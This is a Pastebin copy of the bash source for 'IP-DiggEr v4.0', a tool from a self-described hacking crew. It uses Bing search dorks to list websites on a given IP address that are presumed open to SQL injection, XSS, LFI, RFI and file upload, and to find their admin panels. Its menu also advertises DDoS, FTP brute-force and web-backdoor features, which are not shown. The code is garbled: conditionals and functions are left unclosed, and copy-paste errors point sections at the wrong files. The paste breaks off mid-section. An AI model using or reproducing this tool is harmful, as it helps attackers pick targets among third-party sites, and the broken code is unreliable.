Advertisement
niravkdesai

IP_digger_source

Aug 25th, 2013
4,177
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 115.88 KB | None | 0 0
  1. #!/bin/bash
  2. clear
  3. echo
  4. echo -e "\e[1;32m _-| -------------------------------------------------------------------------------------------------------------- _-| \e[0m"
  5. echo
  6. echo -e "\e[1;33m
  7. ____ ____ ____ ____ ___ ___ ____ ____ _ _ __ ___
  8. (_ _)( _ \ ___ ( _ \(_ _)/ __) / __)( ___)( _ \ ( \/ ) /. | / _ \
  9. _)(_ )___/ (___) )(_) )_)(_( (_-.( (_-. )__) ) / \ / (_ _) ( (_) )
  10. (____)(__) (____/(____)\___/ \___/(____)(_)\_) \/ (_) () \___/
  11. echo
  12. echo -e " \e[1;31m [+] Project Name :- \e[1;37m IP-DiggEr v4.0 The Next Level "
  13. echo -e "\e[1;31m [+] Coded by :- \e[1;37m Manoj Nath and Gurender Singh"
  14. echo -e "\e[1;31m [+] Version :- \e[1;37m IP-DiggEr v4.0"
  15. echo -e "\e[1;31m [+] Report Bugs to :- \e[1;33m freakcoderz@gmail.com"
  16. echo -e "\e[1;31m [+] Like Us on Facebook :- \e[1;35m https://www.facebook.com/FreakCoderz "
  17. echo -e "\e[1;31m [+] Follow Us on Twitter :-\e[1;35m https://twitter.com/FreakCoderz "
  18. echo
  19. echo
  20. echo -e "\e[1;32m _-| -------------------------------------------------------------------------------------------------------------- _-| \e[0m"
  21. echo
  22. read -p " Press Enter To Cont. :- "
  23. echo
  24. while [ 1 ]; do
  25. echo
  26. echo -e "\e[1;31m <^> INDIAN\e[0m \e[1;32mHACKERS <^> \e[0m"
  27. echo
  28. echo -e "\e[1;34m PHP Server Based \e[0m"
  29. echo "--------------------------------------------"
  30. echo -e "1 - SQLI Websites \e[1;31m [+] Advance Search Mode Added \e[0m"
  31. echo -e "2 - XSS Websites \e[1;31m [+] Advance Search Mode Added \e[0m"
  32. echo -e "3 - LFI Websites \e[1;31m [+] Advance Search Mode Added \e[0m"
  33. echo -e "4 - RFI Websites \e[1;31m [+] Advance Search Mode Added \e[0m"
  34. echo -e "5 - Admin Panels \e[1;31m [+] Advance Search Mode Added \e[0m"
  35. echo -e "6 - Upload Vulnerability\e[1;31m [+] Advance Search Mode Added \e[0m"
  36. echo
  37. echo -e "\e[1;34m ASP Server Based \e[0m"
  38. echo "--------------------------------------------"
  39. echo -e "7 - ASP SQLI Websites \e[1;31m [+] Advance Search Mode Added \e[0m"
  40. echo -e "8 - ASP XSS Websites \e[1;31m [+] Advance Search Mode Added \e[0m"
  41. echo -e "9 - ASP Admin Panels \e[1;31m [+] Advance Search Mode Added \e[0m"
  42. echo -e "10 - ASP Upload Vulnerability\e[1;31m [+] Advance Search Mode Added \e[0m"
  43. echo
  44. echo -e "\e[1;34m Website Related Tools \e[0m"
  45. echo "--------------------------------------------"
  46. echo "11 - Wordpress Website Finder"
  47. echo "12 - Joomla Website Finder"
  48. echo -e "13 - Sub Domain Scanner \e[1;32m [+] New Feature Added \e[0m "
  49. echo -e "14 - Web Terminator ( DDos Attack ) \e[1;32m [+] New Feature Added \e[0m"
  50. echo -e "15 - IP Resolver \e[1;32m [+] New Feature Added \e[0m"
  51. echo -e "16 - NS Lookup \e[1;32m [+] New Feature Added \e[0m"
  52. echo -e "17 - FTP Brute Force \e[1;31m[+] New Feature Added \e[0m"
  53. echo -e "18 - Admin Panel Finder \e[1;31m[+] New Feature Added \e[0m"
  54. echo
  55. echo -e "\e[1;34m Website Vulnerability Scanning To0ls \e[0m"
  56. echo "--------------------------------------------"
  57. echo -e "19 - Joomla Vulnerability Scanner \e[1;31m [+] New Feature Added \e[0m"
  58. echo -e "20 - Wordpress Vulnerability Scanner \e[1;31m[+] New Feature Added \e[0m"
  59. echo -e "21 - UniScan -> Web Vulnerability Scanner \e[1;31m[+] New Feature Added \e[0m"
  60. echo "--------------------------------------------"
  61. echo -e "22 - Uploaded Shell Finder ( Website ) \e[1;31m [+] New Feature Added \e[0m"
  62. echo "--------------------------------------------"
  63. echo
  64. echo -e "\e[1;34m Web-Backd0or ( Weevely ) \e[0m"
  65. echo "--------------------------------------------"
  66. echo -e "23 - Web Backd0or Generator ( Weevely )"
  67. echo -e "24 - Web Backd0or Server Connect0r ( Weevely )"
  68. echo
  69. echo -e "\e[1;34m Other Hacking To0lKit \e[0m"
  70. echo "--------------------------------------------"
  71. echo -e "25 - W3bSploit T0olkit by 0x0ptim0us"
  72. echo "=============================================="
  73. echo -e "77 - BUgs LeeChers"
  74. echo -e "88 - \e[1;34mABout Un_N0n \e[0m "
  75. echo -e "99 - ABout IP-DiggEr v 4 .0 "
  76. echo -e "100 - ABout Freak Coderz "
  77. echo
  78. echo -e "\e[1;32m <^>------------------------------------<^> \e[0m"
  79. read -p " Enter Your Choice : " mychoice
  80. echo
  81. if [ "$mychoice" = "1" ]; then
  82. echo -e " \e[1;32m <^> ---------------------------------- <^> "
  83. echo " Tool Name :- IP DiggEr ( Advance SQLI Website Finder )"
  84. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  85. echo " <^> ---------------------------------- <^> "
  86. echo -e " \e[1;32m <^> --------- Advance SQL Vulnerable Site Finder ( IP Address ) ---------- <^> \e[0m "
  87. echo
  88. echo -e " \e[1;35m This Tool will scan for the SQLI Vulnerable websites on the IP Address that You will Provide it =)) \e[0m "
  89. echo
  90. read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
  91. echo -e " \e[1;36m<^> Finding SQLI Websites B| <^> \e[0m"
  92. #<!--- Blank Input -----------------!>
  93. if [ -z $ipaddress ]; then
  94. echo "-_- ----------------------------- -_- "
  95. echo -e "\e[1;31m Blank Input \e[0m"
  96. echo "-_- ----------------------------- -_- "
  97. exit
  98. #<!--- SQLI Website Finder ---!>
  99. F_ARG=$ipaddress
  100. page=0
  101. last_page_check=
  102. how_many=1
  103. single_page=
  104. domain=
  105. function usage()
  106. echo ""
  107. echo "<^> ---------------------------------- <^> "
  108. echo " Tool Name :- IP DiggEr ( SQLI Website Finder )"
  109. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  110. echo "<^> ---------------------------------- <^> "
  111. # check for inputs
  112. if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
  113. Usage;
  114. exit 1
  115. if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
  116. then
  117. echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
  118. exit 1
  119. echo -e "\e[1;31m <^> Searching on Bing =))\e[0m\n "
  120. while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
  121. url="http://www.bing.com/search?q=ip:$ipaddress+.php?id=&qs=n&pq=ip:$ipaddress+.php?id=&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
  122. wget -q -O sql_website_finder.php "$url"
  123. last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' sql_website_finder.php`
  124. #no results
  125. how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' sql_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
  126. #single page result
  127. single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' sql_website_finder.php`
  128. cat "sql_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" sql_website_finder.php | cut -d '"' -f 2 >> sql_vulnerable_websites.txt
  129. rm -f sql_website_finder.php
  130. let page=$page+1
  131. done
  132. cat sql_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> sqli_websites.txt
  133. number=0
  134. for line in `cat sqli_websites.txt`
  135. varfor=`echo "$line" | egrep "$ipaddress"`
  136. let number=$number+1
  137. if [ -z $varfor ]
  138. then
  139. echo "$number" >> many.txt
  140. done
  141. count=0
  142. for txtvar in `cat many.txt`
  143. let del=$txtvar-$count
  144. hey=$del
  145. sed -i "$hey"d sqli_websites.txt
  146. let count=$count+1
  147. done
  148. #sort SQL websites
  149. found_N=`wc -l sql_vulnerable_websites.txt | sed 's/sql_vulnerable_websites.txt//'`
  150. echo
  151. echo -e "\e[1;37mFound $found_N SQLI Websites =)) \e[0m"
  152. rm -f many.txt;
  153. rm -f sqli_websites.txt
  154. echo
  155. echo -e "\e[1;34m <^> Searched websites have been saved in sql_vulnerable_websites.txt =))
  156. \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
  157. echo
  158. echo "<^> --------------------------------------------------- <^> "
  159. #<!---- XSS Script ----!>
  160. if [ "$mychoice" = "2" ]; then
  161. echo -e " \e[1;32m <^> ---------------------------------- <^> "
  162. echo " Tool Name :- IP DiggEr ( Advance XSS Vulnerable Website Finder )"
  163. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  164. echo " <^> ---------------------------------- <^> "
  165. echo -e " \e[1;32m <^> --------- Advance XSS Vulnerable Site Finder ( IP Address ) ---------- <^> \e[0m "
  166. echo
  167. echo -e " \e[1;35m This Tool will scan for the XSS Vulnerable websites on the IP Address that You will Provide it =)) \e[0m "
  168. echo
  169. read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
  170. echo -e " \e[1;36m<^> Finding XSS Websites B| <^> \e[0m"
  171. #<!--- Blank Input -----------------!>
  172. if [ -z $ipaddress ]; then
  173. echo "-_- ----------------------------- -_- "
  174. echo -e "\e[1;31m Blank Input \e[0m"
  175. echo "-_- ----------------------------- -_- "
  176. exit
  177. #<!--- SQLI Website Finder ---!>
  178. F_ARG=$ipaddress
  179. page=0
  180. last_page_check=
  181. how_many=1
  182. single_page=
  183. domain=
  184. function usage()
  185. echo ""
  186. echo "<^> ---------------------------------- <^> "
  187. echo " Tool Name :- IP DiggEr ( XSS Vulnerable Website Finder )"
  188. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  189. echo "<^> ---------------------------------- <^> "
  190. # check for inputs
  191. if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
  192. Usage;
  193. exit 1
  194. if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
  195. then
  196. echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
  197. exit 1
  198. echo -e "\e[1;31m <^> Searching on Bing =))\e[0m\n "
  199. while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
  200. url="http://www.bing.com/search?q=ip:$ipaddress+search.php?&qs=n&pq=ip:$ipaddress+search.php?&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
  201. wget -q -O xss_website_finder.php "$url"
  202. last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' xss_website_finder.php`
  203. #no results
  204. how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' xss_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
  205. #single page result
  206. single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' xss_website_finder.php`
  207. cat "sql_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" xss_website_finder.php | cut -d '"' -f 2 >> xss_vulnerable_websites.txt
  208. rm -f xss_website_finder.php
  209. let page=$page+1
  210. done
  211. cat xss_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> xss_websites.txt
  212. number=0
  213. for line in `cat sqli_websites.txt`
  214. varfor=`echo "$line" | egrep "$ipaddress"`
  215. let number=$number+1
  216. if [ -z $varfor ]
  217. then
  218. echo "$number" >> many.txt
  219. done
  220. count=0
  221. for txtvar in `cat many.txt`
  222. let del=$txtvar-$count
  223. hey=$del
  224. sed -i "$hey"d xss_websites.txt
  225. let count=$count+1
  226. done
  227. #sort SQL websites
  228. found_N=`wc -l xss_vulnerable_websites.txt | sed 's/xss_vulnerable_websites.txt//'`
  229. echo
  230. echo -e "\e[1;37mFound $found_N XSS Websites =)) \e[0m"
  231. rm -f many.txt;
  232. rm -f xss_websites.txt
  233. echo
  234. echo -e "\e[1;34m <^> Searched websites have been saved in xss_vulnerable_websites.txt =))
  235. \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
  236. echo
  237. echo "<^> --------------------------------------------------- <^> "
  238. #<!---- LFI Vulnerable Finder ----!>
  239. if [ "$mychoice" = "3" ]; then
  240. echo -e " \e[1;32m <^> ---------------------------------- <^> "
  241. echo " Tool Name :- IP DiggEr ( Advance LFI Vulnerable Website Finder )"
  242. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  243. echo " <^> ---------------------------------- <^> "
  244. echo -e " \e[1;32m <^> --------- Advance LFI Vulnerable Site Finder ( IP Address ) ---------- <^> \e[0m "
  245. echo
  246. echo -e " \e[1;35m This Tool will scan for the LFI Vulnerable websites on the IP Address that You will Provide it =)) \e[0m "
  247. echo
  248. read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
  249. echo -e " \e[1;36m<^> Finding LFI Websites B| <^> \e[0m"
  250. #<!--- Blank Input -----------------!>
  251. if [ -z $ipaddress ]; then
  252. echo "-_- ----------------------------- -_- "
  253. echo -e "\e[1;31m Blank Input \e[0m"
  254. echo "-_- ----------------------------- -_- "
  255. exit
  256. #<!--- SQLI Website Finder ---!>
  257. F_ARG=$ipaddress
  258. page=0
  259. last_page_check=
  260. how_many=1
  261. single_page=
  262. domain=
  263. function usage()
  264. echo ""
  265. echo "<^> ---------------------------------- <^> "
  266. echo " Tool Name :- IP DiggEr ( LFI Vulnerable Website Finder )"
  267. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  268. echo "<^> ---------------------------------- <^> "
  269. # check for inputs
  270. if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
  271. Usage;
  272. exit 1
  273. if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
  274. then
  275. echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
  276. exit 1
  277. echo -e "\e[1;31m <^> Searching on Bing =))\e[0m\n "
  278. while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
  279. url="http://www.bing.com/search?q=ip:$ipaddress+.php?file&qs=n&pq=ip:$ipaddress+.php?file&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
  280. wget -q -O lfi_website_finder.php "$url"
  281. last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' lfi_website_finder.php`
  282. #no results
  283. how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' lfi_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
  284. #single page result
  285. single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' lfi_website_finder.php`
  286. cat "sql_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" lfi_website_finder.php | cut -d '"' -f 2 >> lfi_vulnerable_websites.txt
  287. rm -f lfi_website_finder.php
  288. let page=$page+1
  289. done
  290. cat lfi_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> lfi_websites.txt
  291. number=0
  292. for line in `cat lfi_websites.txt`
  293. varfor=`echo "$line" | egrep "$ipaddress"`
  294. let number=$number+1
  295. if [ -z $varfor ]
  296. then
  297. echo "$number" >> many.txt
  298. done
  299. count=0
  300. for txtvar in `cat many.txt`
  301. let del=$txtvar-$count
  302. hey=$del
  303. sed -i "$hey"d lfi_websites.txt
  304. let count=$count+1
  305. done
  306. #sort SQL websites
  307. found_N=`wc -l lfi_vulnerable_websites.txt | sed 's/lfi_vulnerable_websites.txt//'`
  308. echo
  309. echo -e "\e[1;37mFound $found_N LFI Websites =)) \e[0m"
  310. rm -f many.txt;
  311. rm -f lfi_websites.txt
  312. echo
  313. echo -e "\e[1;34m <^> Searched websites have been saved in lfi_vulnerable_websites.txt =))
  314. \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
  315. echo
  316. echo "<^> --------------------------------------------------- <^> "
  317. #<!---- RFI SCANNER ----!>
  318. if [ "$mychoice" = "4" ]; then
  319. echo -e " \e[1;32m <^> ---------------------------------- <^> "
  320. echo " Tool Name :- IP DiggEr ( Advance RFI Vulnerable Website Finder )"
  321. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  322. echo " <^> ---------------------------------- <^> "
  323. echo -e " \e[1;32m <^> --------- Advance RFI Vulnerable Site Finder ( IP Address ) ---------- <^> \e[0m "
  324. echo
  325. echo -e " \e[1;35m This Tool will scan for the RFI Vulnerable websites on the IP Address that You will Provide it =)) \e[0m "
  326. echo
  327. read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
  328. echo -e " \e[1;36m<^> Finding RFI Websites B| <^> \e[0m"
  329. #<!--- Blank Input -----------------!>
  330. if [ -z $ipaddress ]; then
  331. echo "-_- ----------------------------- -_- "
  332. echo -e "\e[1;31m Blank Input \e[0m"
  333. echo "-_- ----------------------------- -_- "
  334. exit
  335. #<!--- RFI Website Finder ---!>
  336. F_ARG=$ipaddress
  337. page=0
  338. last_page_check=
  339. how_many=1
  340. single_page=
  341. domain=
  342. function usage()
  343. echo ""
  344. echo "<^> ---------------------------------- <^> "
  345. echo " Tool Name :- IP DiggEr ( RFI Vulnerable Website Finder )"
  346. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  347. echo "<^> ---------------------------------- <^> "
  348. # check for inputs
  349. if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
  350. Usage;
  351. exit 1
  352. if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
  353. then
  354. echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
  355. exit 1
  356. echo -e "\e[1;31m <^> Searching on Bing =))\e[0m\n "
  357. while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
  358. url="http://www.bing.com/search?q=ip:$ipaddress+.php?file&qs=n&pq=ip:$ipaddress+.php?file&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
  359. wget -q -O rfi_website_finder.php "$url"
  360. last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' rfi_website_finder.php`
  361. #no results
  362. how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' rfi_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
  363. #single page result
  364. single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' rfi_website_finder.php`
  365. cat "rfi_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" rfi_website_finder.php | cut -d '"' -f 2 >> rfi_vulnerable_websites.txt
  366. rm -f rfi_website_finder.php
  367. let page=$page+1
  368. done
  369. cat rfi_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> rfi_websites.txt
  370. number=0
  371. for line in `cat rfi_websites.txt`
  372. varfor=`echo "$line" | egrep "$ipaddress"`
  373. let number=$number+1
  374. if [ -z $varfor ]
  375. then
  376. echo "$number" >> many.txt
  377. done
  378. count=0
  379. for txtvar in `cat many.txt`
  380. let del=$txtvar-$count
  381. hey=$del
  382. sed -i "$hey"d rfi_websites.txt
  383. let count=$count+1
  384. done
  385. #sort SQL websites
  386. found_N=`wc -l rfi_vulnerable_websites.txt | sed 's/rfi_vulnerable_websites.txt//'`
  387. echo
  388. echo -e "\e[1;37mFound $found_N RFI Websites =)) \e[0m"
  389. rm -f many.txt;
  390. rm -f rfi_websites.txt
  391. echo
  392. echo -e "\e[1;34m <^> Searched websites have been saved in rfi_vulnerable_websites.txt =))
  393. \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
  394. echo
  395. echo "<^> --------------------------------------------------- <^> "
  396. #<!---- Admin Panel ----!>
  397. if [ "$mychoice" = "5" ]; then
  398. echo -e " \e[1;32m <^> ---------------------------------- <^> "
  399. echo " Tool Name :- IP DiggEr ( Advance Admin Panel Website Finder )"
  400. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  401. echo " <^> ---------------------------------- <^> "
  402. echo -e " \e[1;32m <^> --------- Advance Admin Panel Finder ( IP Address ) ---------- <^> \e[0m "
  403. echo
  404. echo -e " \e[1;35m This Tool will scan for the Admin Panels on the IP Address that You will Provide it =)) \e[0m "
  405. echo
  406. read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
  407. echo -e " \e[1;36m<^> Finding Admin Panels B| <^> \e[0m"
  408. #<!--- Blank Input -----------------!>
  409. if [ -z $ipaddress ]; then
  410. echo "-_- ----------------------------- -_- "
  411. echo -e "\e[1;31m Blank Input \e[0m"
  412. echo "-_- ----------------------------- -_- "
  413. exit
  414. #<!--- RFI Website Finder ---!>
  415. F_ARG=$ipaddress
  416. page=0
  417. last_page_check=
  418. how_many=1
  419. single_page=
  420. domain=
  421. function usage()
  422. echo ""
  423. echo "<^> ---------------------------------- <^> "
  424. echo " Tool Name :- IP DiggEr ( Admin PAnel Finder )"
  425. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  426. echo "<^> ---------------------------------- <^> "
  427. # check for inputs
  428. if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
  429. Usage;
  430. exit 1
  431. if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
  432. then
  433. echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
  434. exit 1
  435. echo -e "\e[1;31m <^> Searching on Bing =))\e[0m\n "
  436. while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
  437. url="http://www.bing.com/search?q=ip:$ipaddress+admin+login&qs=n&pq=ip:$ipaddress+admin+login&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
  438. wget -q -O ap_website_finder.php "$url"
  439. last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' ap_website_finder.php`
  440. #no results
  441. how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' ap_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
  442. #single page result
  443. single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' ap_website_finder.php`
  444. cat "ap_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" ap_website_finder.php | cut -d '"' -f 2 >> ap_vulnerable_websites.txt
  445. rm -f ap_website_finder.php
  446. let page=$page+1
  447. done
  448. cat ap_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> ap_websites.txt
  449. number=0
  450. for line in `cat ap_websites.txt`
  451. varfor=`echo "$line" | egrep "$ipaddress"`
  452. let number=$number+1
  453. if [ -z $varfor ]
  454. then
  455. echo "$number" >> many.txt
  456. done
  457. count=0
  458. for txtvar in `cat many.txt`
  459. let del=$txtvar-$count
  460. hey=$del
  461. sed -i "$hey"d ap_websites.txt
  462. let count=$count+1
  463. done
  464. #sort SQL websites
  465. found_N=`wc -l ap_vulnerable_websites.txt | sed 's/ap_vulnerable_websites.txt//'`
  466. echo
  467. echo -e "\e[1;37mFound $found_N Admin Panels =)) \e[0m"
  468. rm -f many.txt;
  469. rm -f ap_websites.txt
  470. echo
  471. echo -e "\e[1;34m <^> Searched websites have been saved in ap_vulnerable_websites.txt =))
  472. \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
  473. echo
  474. echo "<^> --------------------------------------------------- <^> "
  475. #<!---- Upload Vulnerability ----!>
  476. if [ "$mychoice" = "6" ]; then
  477. echo -e " \e[1;32m <^> ---------------------------------- <^> "
  478. echo " Tool Name :- IP DiggEr ( Advance Upload Vulnerability Finder )"
  479. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  480. echo " <^> ---------------------------------- <^> "
  481. echo -e " \e[1;32m <^> --------- Advance Upload Vulnerability Finder ( IP Address ) ---------- <^> \e[0m "
  482. echo
  483. echo -e " \e[1;35m This Tool will scan for the File Uploading Vulnerable Websites on the IP Address that You will Provide it =)) \e[0m "
  484. echo
  485. read -p "Enter the IP Address ( For example :- 127.0.0.1 ) " ipaddress
  486. echo -e " \e[1;36m<^> Finding File Uploading Vulnerable Websites B| <^> \e[0m"
  487. #<!--- Blank Input -----------------!>
  488. if [ -z $ipaddress ]; then
  489. echo "-_- ----------------------------- -_- "
  490. echo -e "\e[1;31m Blank Input \e[0m"
  491. echo "-_- ----------------------------- -_- "
  492. exit
  493. #<!--- UP Website Finder ---!>
  494. F_ARG=$ipaddress
  495. page=0
  496. last_page_check=
  497. how_many=1
  498. single_page=
  499. domain=
  500. function usage()
  501. echo ""
  502. echo "<^> ---------------------------------- <^> "
  503. echo " Tool Name :- IP DiggEr ( File Uploading )"
  504. echo " Coded by :- Manoj Nath ( Silent Hacker ) "
  505. echo "<^> ---------------------------------- <^> "
  506. # check for inputs
  507. if [ -z "$F_ARG" ] || [ "$F_ARG" == "h" ] || [ "$F_ARG" == "--help" ]; then
  508. Usage;
  509. exit 1
  510. if [ `echo "$F_ARG" | egrep "http://"` ] || [ `echo "$F_ARG" | egrep "Http://"` ];
  511. then
  512. echo -e "\e[1;31mplease insert ipaddress with out http:// \e[0m"
  513. exit 1
  514. echo -e "\e[1;31m <^> Searching on Bing =))\e[0m\n "
  515. while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do
  516. url="http://www.bing.com/search?q=ip:$ipaddress+upload&qs=n&pq=ip:$ipaddress+upload&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"
  517. wget -q -O up_website_finder.php "$url"
  518. last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' up_website_finder.php`
  519. #no results
  520. how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' up_website_finder.php | cut -d '>' -f 2|cut -d ' ' -f 1 -3`
  521. #single page result
  522. single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' up_website_finder.php`
  523. cat "up_website_finder.php" | egrep -o "<h3><a href=\"[^\"]+" up_website_finder.php | cut -d '"' -f 2 >> up_vulnerable_websites.txt
  524. rm -f up_website_finder.php
  525. let page=$page+1
  526. done
  527. cat up_vulnerable_websites.txt | tr '[:upper:]' '[:lower:]' | sed '/www./s///g' | sort | uniq | cut -d '/' -f 3 >> up_websites.txt
  528. number=0
  529. for line in `cat up_websites.txt`
  530. varfor=`echo "$line" | egrep "$ipaddress"`
  531. let number=$number+1
  532. if [ -z $varfor ]
  533. then
  534. echo "$number" >> many.txt
  535. done
  536. count=0
  537. for txtvar in `cat many.txt`
  538. let del=$txtvar-$count
  539. hey=$del
  540. sed -i "$hey"d up_websites.txt
  541. let count=$count+1
  542. done
  543. #sort SQL websites
  544. found_N=`wc -l up_vulnerable_websites.txt | sed 's/up_vulnerable_websites.txt//'`
  545. echo
  546. echo -e "\e[1;37mFound $found_N File Upload Vulnerable Websites =)) \e[0m"
  547. rm -f many.txt;
  548. rm -f up_websites.txt
  549. echo
  550. echo -e "\e[1;34m <^> Searched websites have been saved in up_vulnerable_websites.txt =))
  551. \n Enjoy ( Change the File Name to Prevent Overwrite )<^>\e[0m "
  552. echo
  553. echo "<^> --------------------------------------------------- <^> "
  554. #<!--- About Freak Coderz ---!>
  555. if [ "$mychoice" = "100" ]; then
  556. echo -e " \e[1;32m <^> ---------------------------------- <^> \e[0m"
  557. echo -e " \e[1;32m About FreaK CoderZ \e[0m"
  558. echo " "
  559. echo -e " \e[1;32m <^> ---------------------------------- <^> \e[0m "
  560. echo -e " \e[1;32m Freak Coderz is a Hacking Crew founded by Manoj Nath aka Silent Hacker \e[0m "
  561. echo -e " \e[1;32m This is the first tool created by the Freak Coderz ( Manoj Nath ) For the Hackers to find the Vulnerable websites \e[0m "
  562. echo -e " \e[1;35m Warm Hugs to :- YasH Bhaiya , SOG , Haxor Hasnain , Gurender Singh and All Indian Hackers and Programmers =)) \e[0m "
  563. echo -e " Like our T0ol then like us on the Facebook :- https://www.facebook.com/FreakCoderz "
  564. echo -e " Catch Silent Hacker on the Facebook :- https://www.facebook.com/Sil3nt.H4x0r "
  565. echo -e " \e[1;31m We are :- Silent Hacker | Hind-Hacker | R0ot_InjecTor "
  566. read -p "Press Enter to Continue"
  567. #<!--- BUgs LeeChers ---!>
  568. if [ "$mychoice" = "77" ]; then
  569. echo -e " \e[1;32m <^> ---------------------------------- <^> \e[0m"
  570. echo -e " \e[1;32m BUgs LeeChers Section \e[0m"
  571. echo " "
  572. echo -e " \e[1;32m <^> ---------------------------------- <^> \e[0m "
  573. echo -e "\e[1;31m This Section is for the BUgs LeeChers who found bugs in our tool and reported it :)) "
  574. echo -e "\e[1;34m Previously reported bugs as follows :- \e[0m"
  575. echo -e "Haxor Hasnain reported - BUg in IP-DiggEr v1.0 about the Uncompiling of the Project which doesn't allow it to run on other PC's "
  576. echo
  577. echo -e "Ahmed Reported - BuG how to run the C file i.e IP-Digger.sh.x.c by using gcc method :) "
  578. echo -e "\e[1;31m Thanx to these Guys for reporting the BUgs and Report the BUgs freely :) "
  579. echo
  580. read -p "Press Enter to Continue :)"
  581. #<!--- ASP BASED SERVER ---!>
  582. if [ "$mychoice" = "7" ]; then
  583. echo -e " \e[1;34m <^> ---------------------------------- <^> "
  584. echo " Tool Name :- IP DiggEr ( Advance ASP SQLI Website Finder )"
